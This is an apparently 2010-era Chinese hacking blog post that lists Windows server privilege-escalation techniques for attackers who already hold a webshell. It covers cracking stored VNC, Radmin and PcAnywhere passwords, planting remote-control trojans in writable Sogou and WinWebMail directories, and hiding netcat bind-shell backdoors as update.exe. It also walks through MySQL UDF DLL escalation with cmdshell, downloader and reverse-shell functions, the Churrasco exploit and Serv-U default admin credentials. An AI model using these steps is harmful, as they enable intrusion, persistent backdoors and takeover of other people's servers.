系统提权方法大汇总
发布:admin | 发布时间: 2010年1月30日No.10 Vnc
Vnc不少老外都在用,国内用的比较少,但是几率很大。
==============
VNC提权方法
==============
利用shell读取vnc保存在注册表中的密文,使用工具VNC4X破解
注册表位置:HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4\password
69 45
150 96
177 b1
243 f3
153 99
89 59
148 94
22 16
No.9 Radmin
Radmin 是一款很不错的服务器管理无论是远程桌面控制,还是文件传输,速度都很快,很方便。
Radmin 默认端口是4899,无密码。不过服务器注重的是安全,一定会修改默认端口和密码的,端口与密码读取位置:
HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\Parameter//默认密码注册表位置
HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\Port //默认端口注册表位置
以前我们可以用海洋木马所带的功能来读出键值,然后进行转换得到hash值,但是现在有个更方便的东西,把ASP文件传到服务器上,打开可直接读出Radmin的hash和Radmin服务端口!
No.8 PcAnywhere
PcAnywhere是一款用得很多的远程管理软件,他有一个重大漏洞是保存远程管理员帐号的CIF文件密码,是可以被轻易解密的,如果我们拿到一台主机的WEBSEHLL。通过查找发现其上安装有PCANYWhere 同时保存密码文件的目录是允许我们的IUSER权限访问,我们可以下载这个CIF文件到本地破解,再通过PCANYWhere从本机登陆服务器。思路简单而明确。
Ps:保存密码的CIF文件,不是位于PCANYWhere的安装目录,而且位于安装PCANYWhere所安装盘的\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ 如果PCANYWhere安装在D:\program\文件下下,那么PCANYWhere的密码文件就保存在D:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\文件夹下。
No.7 搜狗输入法
不少管理都使用五笔打字,不过还是有少数人喜欢用拼音,智能ABC功能少,没有全拼功能,所以大多都选择了搜狗输入法。
搜狗输入法根目录下有一个:PinyinUp.exe 是用来更新词典用的,管理员为了保存词库,有可能会把搜狗输入法安装到D盘,搜狗输入法目录默认是Everyone可读可写,直接捆绑上远控等下次重启就会上线了。
No.6 WinWebMail企业邮局系统 7i24.com
WinWebMail目录下的web必须设置everyone权限可读可写,不然邮件登陆不上去等等,所以在开始程序里找到WinWebMail快捷方式下下来,看路径,访问 路径\web传shell,访问shell后,权限是system,放远控进启动项,等待下次重启。没有删cmd组建的直接加用户。
7i24的web目录也是可写,权限为administrator。
No.5 NC反弹
nc的使用实例
c:\nc.exe -l -p 4455 -d -e cmd.exe 可以很好的隐藏一个NetCat后门。
c:\nc.exe -p 4455 -d -L -e cmd.exe 这个命令可以让黑客利用NetCat重新返回系统,直到系统管理员在任务管理器中看见nc.exe在运行,从而发现这个后门,我们一样可以把它做的更加隐蔽,
c:\move nc.exe c:\windows\system32\Drivers\update.exe
c:\windows\systeme32\drivers\update.exe -p 4455 -d -L -e cmd.exe
系统管理员可能把特权附属于一些无害的程序,如update.exe等,黑客也可以隐藏命令行。
c:\windows\systme32\drivers\update.exe
cmd line: -l -p 4455 -d -L -e cmd.exe
c:\>
nc -l - p 80 监听80端口
nc -l -p 80 >c:\log.dat 监听80端口,并把信息记录到log.dat中
nc -v -l -p 80 监听80端口,并显示端口信息
nc -vv -l -p 80 监听80端口,显示更详细的端口信息
nc -l -p 80 -t -e cmd.exe监听本地的80端口的入站信息,同时将cmd.exe重定向到80端口,当有人连接的时候,就让cmd.exe以telnet的形式应答。当然这个最好用在控制的肉鸡上。
nc -v ip port 扫瞄某IP的某个端口
nc -v -z ip port-port扫描某IP的端口到某端口
nc -v -z -u ip port-port扫描某IP的某UDP端口到某UDP端口
No.4 mssql(sa) mysql(root)
sa 1433对外关闭的话,可以构建注入点。
<%
strSQLServerName = "服务器ip"
strSQLDBUserName = "数据库帐号"
strSQLDBPassword = "数据库密码"
strSQLDBName = "数据库名称"
Set conn = Server.createObject("ADODB.Connection")
strCon = "Provider=SQLOLEDB.1;Persist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & ";Password=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"
conn.open strCon
dim rs,strSQL,id
set rs=server.createobject("ADODB.recordset")
id = request("id")
strSQL = "select * from ACTLIST where worldid=" & idrs.open strSQL,conn,1,3
rs.close
root su.php配合udf.dll提权
第一步:将PHP文件上传到目标机上,填入你的MYSQL账号经行连接。
第二步:连接成功后,导出DLL文件,导出时请勿必注意导出路径(一般情况下对任何目录可写,无需考虑权限问题),对于MYSQL5.0以上版本,你必须 将DLL导出到目标机器的系统目录(win 或 system32),否则在下一步操作中你会看到"No paths allowed for shared library"错误。
第三步:使用SQL语句创建功能函数。语法:Create Function 函数名(函数名只能为下面列表中的其中之一) returns string soname '导出的DLL路径';对于MYSQL5.0以上版本,语句中的DLL不允许带全路径,如果你在第二步中已将DLL导出到系统目录,那么你就可以省略路径 而使命令正常执行,否则你将会看到"Can't open shared library"错误,这时你必须将DLL重新导出到系统目录。
第四步:正确创建功能函数后,你就可以用SQL语句来使用这些功能了。语法:select 创建的函数名('参数列表'); 每个函数有不同的参数,你可以使用select 创建的函数名('help');来获得指定函数的参数列表信息。
udf.dll功能函数说明:
cmdshell 执行cmd;
downloader 下载者,到网上下载指定文件并保存到指定目录;
open3389 通用开3389终端服务,可指定端口(不改端口无需重启);
backshell 反弹Shell;
ProcessView 枚举系统进程;
KillProcess 终止指定进程;
regread 读注册表;
regwrite 写注册表;
shut 关机,注销,重启;
about 说明与帮助函数;
No.3 03 0day
如果支持Asp.Net组件,传Asp.Net Shell,传cmd(在Asp环境下也成功过,不过介绍上写的必须以Asp.Net运行)
使用方法:Churrasco.exe "命令"
No.2 Serv-u
漏洞是使用Serv-u本地默认管理端口,以默认管理员登陆新建域和用户来执行命令,Serv-u>3.x版本默认本地管理端口是:43958,默认管理员:LocalAdministrator,默认密码:#l@$ak#.lk;0@P,这是集成在Serv-u内部的,可以以Guest权限来进行连接,对Serv-u进行管理。
No.1 0day
文章如转载,请注明转载自:http://www.5iadmin.com/post/154.html
- 相关文章:
发表评论
◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。